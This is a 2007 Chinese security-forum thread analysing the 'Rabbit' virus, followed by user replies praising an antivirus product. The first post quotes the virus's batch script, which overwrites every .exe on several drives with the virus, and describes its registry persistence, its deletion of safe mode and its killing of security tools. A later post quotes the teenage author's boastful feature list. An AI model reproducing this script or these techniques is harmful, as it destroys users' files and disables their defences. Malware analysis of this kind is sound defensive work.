Board logo

标题: (转贴)警惕恶性病毒“兔宝宝”! [打印本页]
作者: 反黑先锋     时间: 2007-4-9 11:46    标题: (转贴)警惕恶性病毒“兔宝宝”!

baohe “病毒运行后关闭Tiny的Activity Monitor、SSM、IceSword等窗口
msexch400.dll插入winlogon.exe进程且不能强制卸除

注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515} :
指向C:\WINDOWS\system32\JK.exe
并删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

系统文件以外(包括非系统分区)的.exe文件均被替换为260K大小的病毒文件(文件名还是原来正常.exe的文件名),图标变为“兔宝宝”。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。

Tiny用户,即使预先设置了相关文件保护规则,病毒依然可以突破Tiny的FD规则,将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是第一次遇到可以突破Tiny 文件保护的病毒。
此毒在系统分区以外的分区中,只要发现一个DLL文件(如:abc.dll),病毒即刻创建一个同名的、260K的.exe(abc.exe),图标也是“兔宝宝”。

中招后,用户就别指望扫什么劳什子日志求助了。运行任何.exe(当然包括SRENG等),你只能见到一闪而过的命令提示符窗口(实际运行的是那个260K的病毒体)。 ”


;)希望大家警惕 目前所有扫毒软件都还无法查杀 微点主动防御拦截处理成功 样本我已上报卡巴和微点。

RABBIT.EXE >
cmd /c  C:\WINDOWS\system32\love.bat:
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

C:\WINDOWS\SYSTEM32\JK.EXE
C:\WINDOWS\SYSTEM32\LOVERABBIT.EXE
C:\WINDOWS\SYSTEM32\RABBIT.EXE

[ Last edited by 反黑先锋 on 2007-4-9 at 21:05 ]
附件 1: sshot-119.png (2007-4-9 11:46, 6.22 K,下载次数: 68)


附件 2: sshot-120.png (2007-4-9 11:46, 27.51 K,下载次数: 35)


附件 3: sshot-121.png (2007-4-9 11:46, 20.69 K,下载次数: 55)


附件 4: sshot-122.png (2007-4-9 11:47, 20.58 K,下载次数: 55)


附件 5: sshot-123.png (2007-4-9 11:47, 22.56 K,下载次数: 67)


附件 6: sshot-124.png (2007-4-9 11:47, 20.29 K,下载次数: 63)


附件 7: sshot-125.png (2007-4-9 12:07, 21.46 K,下载次数: 40)


作者: 反黑先锋     时间: 2007-4-9 12:35    标题: 放行love.bat

创建时间 键 名称 原数据 新数据 创建者
2007-04-09 12:18:44 HKLM\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4BF41072-B2B1-21C1-B5C1-0305F4155515}\ STUBPATH   C:\WINDOWS\SYSTEM32\JK.EXE  C:\WINDOWS\SYSTEM32\LOVERABBIT.EXE









K.0

病毒把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe(正在运行的不替换)

msconfig1.inf和msconfig.inf虽然已经无害  建议微点也一并清除。
作者: 微点专家     时间: 2007-4-9 13:44
反黑做事永远都是那么的用心
作者: 2002lihong     时间: 2007-4-9 17:30
恶心病毒越来越多,还是用微点好。
作者: jaber     时间: 2007-4-9 18:29
每次你的速度总是那么快!啥时候你上个Q好不?
作者: 反黑先锋     时间: 2007-4-9 20:30


2007-04-08 14:48 编写这个病毒的15岁作者正在网上公布他的“作品” 并留下了他的联系方式


“病毒下载地址:X
一直在学习,却发现自己真的很差,不想多说,还是为自己的兴趣和爱好而奋斗!

之所以要命名为Rabbit.exe,是因为我现在的恋人的外号叫“兔子”,哈哈,就这样吧!

去年10月左右发布第一个病毒:魔鬼爱好者。。。现在看来垃圾的不能在垃圾了(基本由批处理完成,烂

的要死!)
之后又发布一个全部由VB编写的魔鬼爱好者2新年版 ,好象是圣诞节的时候吧,具体时间不清楚了,现在

看来也很烂,基本没任何保护措施!


后来还发布了3个小工具,具体的大家搜我以前发的帖子吧!


前段时间又弄了一个baidu大盗,就是可以盗取baidu贴吧ID的木马,但想下,一没技术含量二没什么意思

,又不是魔兽木马,哈哈!所以就没发出来了,而且都不是生成器,只是一个木马体!

现在呢,又要发布我的新病毒了~废话就不多说了~简单介绍一下!没什么技术含量高手不要见笑!

运行后
将释放几个文件
然后病毒主体将插入WINLOGON。EXE系统关键进程!(算是核心了)
杀冰刃
U盘传播
QQ尾巴 (暂时还没挂马!)
AutoRun.inf(老手法了)
修改注册表以便启动,注册表位置比较深!网上基本没有此注册位置的介绍,至于在哪,用监视工具就可

以清楚的看到了,呵呵!
另外替换除C盘外其他盘上的所有EXE文件!(C盘包括\Program Files目录也会被替换!)
破坏安全模式

基本就这些,其实没什么破坏力,当然除了替换,如果没有替换的话,基本没任何破坏力,只不过电脑速

度就要慢了一些了~呵呵!

插到WINLOGON。EXE进程中的DLL比较特殊!怎么说呢,如果冰刃侥幸没有被杀(被杀的可能是80%),那

么也无法将DLL从WINLOGON。EXE进程中卸载出来,反而冰刃会卡死!当然你直接把WINLOGON。EXE结束了

也可以,那么你电脑就去屎吧!哈哈!

差不多就这些了~~只做技术研究!切勿XXXXX....其实说了也没用,都是废话,呵呵!

我的QQ X
E-MAIL : X@163.com

看不爽的,看不惯的,请不要关!发贴是我自由,做什么也是我的自由,你们不爽,闪开!你们也管不着

!要骂别到这里骂爹骂娘,有本事自己把自己保护好!不要JJYY谢谢各位了!呵呵!!

另外病毒可能还有BUG,不过我自己测试全部OK,其他的就不知道了,呵呵,不管了!

WELCOME    支持我的顶一个!

呵呵
挑战?
HO MY GOD。。。SORRY
一小小病毒啊,我想不至于被抓OR被怎么样吧?呵呵
我只是发出来玩玩而已没别的意思啊!希望你们不要误会
不存在什么暴发不暴发的
一没技术二没鸡群
怎么暴发呢!?呵呵

还是有很多BUG的
我会再次修改的
不过2000的系统好象不支持,呵呵!

希望高手多指点一二

晕死
不会吧?怎么这么快就有回复了?
gest 兄不会真的报警了吧?
呵呵
我才15岁啊。。希望不要这么快进监狱,不过我想最多教育一下也就是了。。。不过看到gest 兄说报警了,我心还真的震了一下。。。"

"病毒我将停止更新...."

[ Last edited by 反黑先锋 on 2007-4-9 at 22:45 ]
作者: wkwx     时间: 2007-4-9 21:38
闲得骨头疼了
作者: 408983504     时间: 2007-4-9 21:42
牛人啊!!!
作者: jaber     时间: 2007-4-9 21:50
反黑   给你看个帖子  
http://bbs.gdut.edu.cn/NGPXBBS/con?B=Virus&F=M.1176173101.A
作者: 反黑先锋     时间: 2007-4-9 22:02


  Quote:
Originally posted by jaber at 2007-4-9 21:50:
反黑   给你看个帖子  
http://bbs.gdut.edu.cn/NGPXBBS/con?B=Virus&F=M.1176173101.A

他微点版本是3月9日的! 一个月前的:P

“其间出现一件意料不到的事,已退出的微点升级……之前已提过退出微点,微点的进程不会自动退出,可以手动结束。但没想到还会升级呀,当然是不让它升级啦。

忘了微点之前有一次升级是要重启的,没想到刚才“否”了后,还是顽强的继续升级,呼呼…… ”

:)牛 原来微点退出还能升级。。 自动升级的吧我以后试试

[ Last edited by 反黑先锋 on 2007-4-9 at 22:10 ]
作者: a393310872     时间: 2007-4-9 22:06
没用过tiny...不知道怎么突破...其他的功能模仿起来倒没什么困难
作者: 国伟     时间: 2007-4-9 22:16
进程还在,在任务管理器中我没有结束微点的进程,只是从系统托盘中右击“退出”而已
作者: 反黑先锋     时间: 2007-4-9 22:27
ToY*牛人来了 我刚注册了ID用不上 从系统托盘中右击“退出” 微点还是能够自动升级的 这个是楼上先发现的:lol:
这支毒除了可以绕过tiny 国产的hips软件EQ据说也拦不住 hips也不是万能 没有万能

目前需要不断完善的主动防御不是解决病毒的根本方法,但是 微点主动防御软件一定是走在了特征码前面! 楼主的版本是上个月的呵呵厉害 我准备在出扫描之前也不更新微点了。
作者: 国伟     时间: 2007-4-9 23:41
呵呵,那是因为我是在虚拟机中保存的镜像快照,所以还是3月9日的版本。很偶然的也想试试微点在没升级的情况下跟其他杀毒软件的最新病毒库来个PK,所以有了这个强烈的对比,哈哈!

另外,本来虚拟机里面我是用NAT方式共享上网的,网速当然慢一点,且是在中毒的情况下(电脑变慢,虚拟机内存只有196M),但微点在已退出(进程未退出)的情况下,完成如此大批量的升级(整整1个月呀,呵呵),的确令我意外^_^

继续加油哈,没选错微点,自从第一次用上就没换过其他的了……
作者: l3586     时间: 2007-4-10 12:00
刚才试了一下,微点完全可以防御,不过,我用的是最新版本。
作者: laidaqun     时间: 2007-4-10 15:59
看来也快出“红牛”病毒了。啥米病毒都有。怕怕哦!呵呵!



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn